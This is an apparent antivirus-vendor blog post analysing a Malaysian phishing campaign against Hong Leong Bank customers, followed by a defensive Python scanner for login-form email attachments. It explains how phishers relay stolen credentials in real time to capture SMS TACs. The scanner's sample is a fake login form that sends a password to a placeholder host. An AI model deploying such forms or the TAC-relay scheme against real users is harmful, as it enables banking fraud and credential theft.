Malaysian Phishing in real-time

For several weeks we have been seeing a higher volume of spam and phishing emails in Malaysia.

Recently, our Virus Lab in Malaysia came across phishing mails in the Malay language impersonating Hong Leong Bank. Even though this phishing attack has only a local impact, it shows how the phishers have learnt to interact with the attacked bank in real time in order to make their transactions even more realistic to the user.

The email asks the recipient to confirm their account data because of a database update. To do so, the recipient is supposed to open the attached HTML "update form".

The background to this story is the takeover of the EON bank group by Hong Leong Bank earlier this year.

The attached “update form” opens up a local, faked Hong Leong login page:

After entering the user name and password, the user is forwarded to another fake page, which claims that verification is in progress.

In the meantime, the phishers use the entered login credentials on the real Hong Leong online banking site to trigger the bank to send the victim an SMS with a TAC (TransActionCode), the same as the usual mTAN in Europe and the US.


This process is interesting and innovative because the scam does everything in real time rather than offline, as is usual. Until now, we had only seen scams that ask the user to submit some TAN/TAC numbers, which the scammers would use later to make transactions on behalf of the user.

Last year, most banks around the world changed from the usual paper TAN/TAC tables to the more modern and secure mTAN (mobile TAN), which uses the mobile phone to receive the TAN via SMS. This is a classic example of two-factor authentication, which we have already addressed in several posts. A two-factor authentication mechanism requires two things in order to prove that it is indeed you:

– something that only you know (e.g.: username/password and a code like TAC/TAN)

– something that only you own (e.g.: mobile phone)

The next step is to obtain from the victim the TAC that the bank has just sent.

For this, the phishers set up a special page that requests the TAC:

Right after this, the faked process ends with the following page, informing the user that everything went well:

The page mentions that the database is going to be updated in about 3 hours. This should be enough time for the phishers to get your money, now that they know the login credentials as well as one TAC.

Our investigation indicates that the TAC is valid for only 1 hour after it is sent.

After a few seconds, the page will redirect to the official Hong Leong website in order to make the user feel confident that he didn’t do anything wrong.

We strongly advise our readers not to open such emails, because a bank will never send such requests via email. Always delete these emails without opening any attachments or clicking any links.
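
A mail-gateway check for the delivery method described above, an HTML attachment that opens a local login page. This is an added example, not code from Avira: the function names, the sample message and the host `collector.example` are constructed, and it assumes the attached form contains a password input.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormScanner(HTMLParser):
    """Records form targets and whether any password input is present."""

    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password = True


def scan_message(raw):
    """Return one finding per HTML attachment that contains a password field."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html"))
        if not is_html:
            continue
        body = part.get_payload(decode=True) or b""
        scanner = FormScanner()
        scanner.feed(body.decode(part.get_content_charset() or "utf-8", errors="replace"))
        if scanner.has_password:
            # Hosts the form would submit to; empty if the action is relative or set by script.
            hosts = sorted({urlparse(a).hostname for a in scanner.actions if urlparse(a).hostname})
            findings.append({"attachment": name, "remote_hosts": hosts})
    return findings


def build_message(html, filename="update_form.html"):
    """Constructed sample mail: plain-text body plus one HTML attachment."""
    m = EmailMessage()
    m["Subject"] = "Account update"
    m.set_content("Please open the attached form.")
    m.add_attachment(html, subtype="html", filename=filename)
    return m.as_bytes()


# Constructed sample; collector.example is a placeholder host.
SAMPLE = build_message('<form action="http://collector.example/login" method="post">'
                       '<input name="user"><input type="password" name="pass"></form>')
```

A gateway could quarantine any message for which `scan_message` returns a finding, since a bank has no reason to mail a login form as an attachment.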


Alexander Neth

Manager Virus Lab – Avira Malaysia

Sorin Mustaca

Data Security Expert